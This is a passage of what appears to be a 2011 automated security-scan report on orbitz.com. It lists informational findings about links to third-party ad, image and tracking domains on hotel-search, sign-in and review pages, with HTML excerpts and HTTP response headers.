       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/pegsimages/EX/thumb_BOSHJ.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=&hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=56251&hotel.hotelDetailsKey=56251_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/pegsimages/RC/thumb_BOSTW.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=&hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=23839&hotel.hotelDetailsKey=23839_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/pegsimages/RC/thumb_BOSCM.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=&hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=29959&hotel.hotelDetailsKey=29959_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/pegsimages/MC/thumb_BOSLW.jpg"
           }
   }" /> </a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=&hotel.hotelName=&hotel.couponCode=&search=Search&models['hotelSearchView'].selectHotelDetails=true&hotel.hotelId=69512&hotel.hotelDetailsKey=69512_null_null_null_2&pageView=" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" agent="{
       type:'DeferredImage'
        ,params:{
               src:"http://www.tnetnoc.com/public/pegsimages/CY/BOSDT_thumb.jpg"
           }
   }" /> </a>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1"><a href="http://www.revresda.com/click.ng/adsize=568x143&pos=bottom1&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=568x143&pos=bottom1&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2"><a href="http://www.revresda.com/click.ng/adsize=568x143&pos=bottom2&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=568x143&pos=bottom2&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=160x160&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=160x160&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=336x600&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=336x600&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=336x600&pos=bottom&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=336x600&pos=bottom&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=728x90&pos=bottom&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=728x90&pos=bottom&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.orbitzgames.com">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/">Orbitz for Agents</a>
...[SNIP]...
<li class="icon facebook">
                   <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook</a>
...[SNIP]...
<li class="icon twitter last">
                   <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter</a>
...[SNIP]...
</ul>


            <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/footerLogo/logo-1.png" alt="Orbitz" height="15" width="100" class="logo" />
    <div class="agencyInformation">
...[SNIP]...
<div class="ad americanExpress"><a href="http://www.revresda.com/click.ng/adsize=120x55&pos=footer&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=120x55&pos=footer&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...

<a href="https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&dn=www.orbitz.com&lang=en" class="link" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif" alt="logo" height="35" width="66" />
    </a> <a href="http://www.truste.org/ivalidate.php?url=www.orbitz.com&sealid=101" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif" alt="TRUSTe" height="35" width="128" />
    </a>
...[SNIP]...
<div class="ad clear"><a href="http://www.revresda.com/click.ng/adsize=1x1&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=1x1&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad clear"><a href="http://www.revresda.com/click.ng/adsize=1x1&pos=middle&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=1x1&pos=middle&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad clear"><a href="http://www.revresda.com/click.ng/adsize=1x1&pos=bottom&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=1x1&pos=bottom&Section=results&channel=hotel&tile=1296573846143&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2%2F2%2F11&numberOfRooms=1&hotelCheckInDate=2%2F1%2F11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<noscript> <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

17.381. https://www.orbitz.com/Secure/SignIn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/Secure/SignIn

Issue detail

The page was loaded from a URL containing a query string:

https://www.orbitz.com/Secure/SignIn?z=2eb0&r=3

The response contains the following links to other domains:

https://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
https://www.revresda.com/click.ng/Params.richmedia=yes&channel=none&Section=main&adsize=120x55_footer&CookieName=OSC&secure=true&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663211422&dsrc=7&
https://www.revresda.com/image.ng/Params.richmedia=yes&channel=none&Section=main&adsize=120x55_footer&CookieName=OSC&secure=true&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663211422&dsrc=7&
https://www.revresda.com/js.ng/channel=none&Section=main&adsize=120x55_footer&CookieName=OSC&secure=true&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663211422&dsrc=7&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=D3DD8128C5377A40141A9858208488B0; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:13:30 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure
Content-Length: 17640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="https://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="https://www.revresda.com/js.ng/channel=none&Section=main&adsize=120x55_footer&CookieName=OSC&secure=true&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663211422&dsrc=7&"></script><noscript><a href="https://www.revresda.com/click.ng/Params.richmedia=yes&channel=none&Section=main&adsize=120x55_footer&CookieName=OSC&secure=true&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663211422&dsrc=7&"><img src="https://www.revresda.com/image.ng/Params.richmedia=yes&channel=none&Section=main&adsize=120x55_footer&CookieName=OSC&secure=true&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663211422&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...

17.382. https://www.orbitz.com/account/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/account/login

Issue detail

The page was loaded from a URL containing a query string:

https://www.orbitz.com/account/login?destinationUrl=

The response contains the following links to other domains:

https://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&dn=www.orbitz.com&lang=en
https://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif
https://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif
https://www.tnetnoc.com/siteImages/ORB/brandImages/footerLogo/logo-1.png
https://www.tnetnoc.com/siteImages/ORB/brandImages/headerLogo/logo-2.png
https://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll1.css
https://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll2.css
https://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js
https://www.tnetnoc.com/static/27.4.7/style/global/printAll.css

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=026995801E92D176318AD90FEB65F6DB; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:30:31 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:16:23 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure
Content-Length: 17662

...[SNIP]...
<meta http-equiv="content-language" content="en-US" />

<link rel="stylesheet" type="text/css" href="https://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll1.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="https://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll2.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="https://www.tnetnoc.com/static/27.4.7/style/global/printAll.css" media="print">
               
       <script type="text/javascript" src="https://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<a href="https://www.orbitz.com/" class="link"> <img src="https://www.tnetnoc.com/siteImages/ORB/brandImages/headerLogo/logo-2.png" alt="Orbitz" height="28" width="153" class="logo" />
    </a>
...[SNIP]...
</ul>


            <img src="https://www.tnetnoc.com/siteImages/ORB/brandImages/footerLogo/logo-1.png" alt="Orbitz" height="15" width="100" class="logo" />
    <div class="agencyInformation">
...[SNIP]...
<div class="thirdPartyLogos">
                <a href="https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&dn=www.orbitz.com&lang=en" class="link" target="_blank"> <img src="https://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif" alt="logo" height="35" width="66" />
    </a> <a href="http://www.truste.org/ivalidate.php?url=www.orbitz.com&sealid=101" class="link" target="_blank" rel="nofollow"> <img src="https://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif" alt="TRUSTe" height="35" width="128" />
    </a>
...[SNIP]...
<noscript> <img alt="" border="0" name="DCSIMG" width="1" height="1" src="https://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

17.383. https://www.orbitz.com/trips/writeReview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orbitz.com
Path:	/trips/writeReview

Issue detail

The page was loaded from a URL containing a query string:

https://www.orbitz.com/trips/writeReview?hotelId=24684

The response contains the following links to other domains:

https://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
https://www.tnetnoc.com/siteImages/ORB/brandImages/popupHeaderLogo/logoSmall-1.png
https://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll1.css
https://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll2.css
https://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js
https://www.tnetnoc.com/static/27.4.7/style/global/printAll.css

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B15415278A3C667686225B11283FD050; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:30:39 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:16:31 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.443_gxe=ffffffff09e3087545525d5f4f58455e445a4a42378b;path=/;secure
Content-Length: 10776

...[SNIP]...
<meta http-equiv="content-language" content="en-US" />

<link rel="stylesheet" type="text/css" href="https://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll1.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="https://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll2.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="https://www.tnetnoc.com/static/27.4.7/style/global/printAll.css" media="print">
               
       <script type="text/javascript" src="https://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="module" id="popHeader" >
    <img src="https://www.tnetnoc.com/siteImages/ORB/brandImages/popupHeaderLogo/logoSmall-1.png" alt="Orbitz" height="28" width="153" />
    <div class="links" agent="{
       type:'ScriptContent'
        ,params:{
       content: 'Close window'
       , containerType: 'span'
       , containerClass: 'link'
...[SNIP]...
<noscript> <img alt="" border="0" name="DCSIMG" width="1" height="1" src="https://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
